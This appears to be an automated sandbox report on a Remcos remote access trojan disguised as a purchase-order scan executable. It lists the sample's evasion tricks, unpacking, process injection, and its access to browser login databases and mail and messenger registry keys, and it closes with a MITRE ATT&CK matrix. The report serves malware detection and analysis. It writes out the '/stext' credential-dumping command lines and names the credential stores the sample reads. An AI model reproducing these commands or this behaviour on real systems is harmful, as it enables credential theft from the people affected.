              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeFile opened: C:\Users\user\Desktop\scan_241205-801_draft_PO.cfgJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: scan_241205-801_draft_PO.exeStatic file information: File size 1270336 > 1048576
              Source: scan_241205-801_draft_PO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeUnpacked PE file: 5.2.scan_241205-801_draft_PO.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeUnpacked PE file: 6.2.scan_241205-801_draft_PO.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeUnpacked PE file: 7.2.scan_241205-801_draft_PO.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: Yara matchFile source: Process Memory Space: scan_241205-801_draft_PO.exe PID: 2128, type: MEMORYSTR
              Source: Yara matchFile source: 00000000.00000002.2579216350.0000000006434000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,5_2_004044A4
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 4_2_341D2806 push ecx; ret 4_2_341D2819
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0044693D push ecx; ret 5_2_0044694D
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0044DB70 push eax; ret 5_2_0044DB84
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0044DB70 push eax; ret 5_2_0044DBAC
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_00451D54 push eax; ret 5_2_00451D61
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_0044B090 push eax; ret 6_2_0044B0A4
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_0044B090 push eax; ret 6_2_0044B0CC
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_00451D34 push eax; ret 6_2_00451D41
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_00444E71 push ecx; ret 6_2_00444E81
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_00414060 push eax; ret 7_2_00414074
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_00414060 push eax; ret 7_2_0041409C
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_00414039 push ecx; ret 7_2_00414049
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_004164EB push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_00416553 push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_00416555 push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeFile created: C:\Users\user\AppData\Local\Temp\nss24DE.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_004047CB
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeAPI/Special instruction interceptor: Address: 6A98575
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeAPI/Special instruction interceptor: Address: 2238575
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeRDTSC instruction interceptor: First address: 6A3ADF7 second address: 6A3ADF7 instructions: 0x00000000 rdtsc 0x00000002 test bl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F1A3C877976h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a cmp ecx, edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeRDTSC instruction interceptor: First address: 21DADF7 second address: 21DADF7 instructions: 0x00000000 rdtsc 0x00000002 test bl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F1A3CE087B6h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a cmp ecx, edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss24DE.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeAPI coverage: 10.0 %
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe TID: 2284Thread sleep count: 127 > 30Jump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe TID: 2284Thread sleep time: -63500s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 4_2_341D10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_341D10F1
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 4_2_341D6580 FindFirstFileExA,4_2_341D6580
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407EF8
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407898
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_00418981 memset,GetSystemInfo,5_2_00418981
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.00000000032AD000.00000004.00000020.00020000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.00000000032DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: bhvB489.tmp.5.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeAPI call chain: ExitProcess graph end nodegraph_0-1640
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeAPI call chain: ExitProcess graph end nodegraph_0-1464
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeAPI call chain: ExitProcess graph end nodegraph_6-34110
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 4_2_341D60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_341D60E2
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,5_2_004044A4
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 4_2_341D4AB4 mov eax, dword ptr fs:[00000030h]4_2_341D4AB4
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 4_2_341D724E GetProcessHeap,4_2_341D724E
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 4_2_341D60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_341D60E2
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 4_2_341D2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_341D2639
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 4_2_341D2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_341D2B1C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: NULL target: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: NULL target: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: NULL target: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess created: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe C:\Users\user\Desktop\scan_241205-801_draft_PO.exe /stext "C:\Users\user\AppData\Local\Temp\vxhtinfano"Jump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess created: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe C:\Users\user\Desktop\scan_241205-801_draft_PO.exe /stext "C:\Users\user\AppData\Local\Temp\fzumjfqbbwepy"Jump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess created: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe C:\Users\user\Desktop\scan_241205-801_draft_PO.exe /stext "C:\Users\user\AppData\Local\Temp\itzekyavpewuiglw"Jump to behavior
              Source: scan_241205-801_draft_PO.exe, 00000004.00000003.2751448358.0000000003303000.00000004.00000020.00020000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000004.00000003.2751837305.0000000003303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managervider
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.0000000003303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerH
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.0000000003303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.0000000003303000.00000004.00000020.00020000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000004.00000003.2751448358.0000000003303000.00000004.00000020.00020000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000004.00000003.2751837305.0000000003303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.0000000003303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\~
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.0000000003303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.00000000032DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerp
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.0000000003303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.0000000003303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*l
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.0000000003303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageru
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.00000000032C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager&w
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.00000000032C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNwu
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.0000000003303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\/
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.0000000003303000.00000004.00000020.00020000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.00000000032C2000.00000004.00000020.00020000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.00000000032DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.00000000032C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager=w
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.0000000003303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\*H
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.0000000003303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\Q
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.00000000032C2000.00000004.00000020.00020000.00000000.sdmp, logs.dat.4.drBinary or memory string: [Program Manager]
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 4_2_341D2933 cpuid 4_2_341D2933
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 4_2_341D2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_341D2264
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,6_2_004082CD
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000004.00000002.3267786556.00000000032C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3266189424.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3267786556.00000000032DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: scan_241205-801_draft_PO.exe PID: 3872, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: ESMTPPassword6_2_004033F0
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword6_2_00402DB3
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword6_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: scan_241205-801_draft_PO.exe PID: 3872, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: scan_241205-801_draft_PO.exe PID: 3716, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-UOMZ21Jump to behavior
              Source: Yara matchFile source: 00000004.00000002.3267786556.00000000032C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3266189424.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3267786556.00000000032DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: scan_241205-801_draft_PO.exe PID: 3872, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              2
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
              Process Injection
              1
              Software Packing
              2
              Credentials in Registry
              2
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              1
              Credentials In Files
              228
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets231
              Security Software Discovery
              SSH2
              Clipboard Data
              2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture112
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
              Process Injection
              Proc Filesystem1
              System Owner/User Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
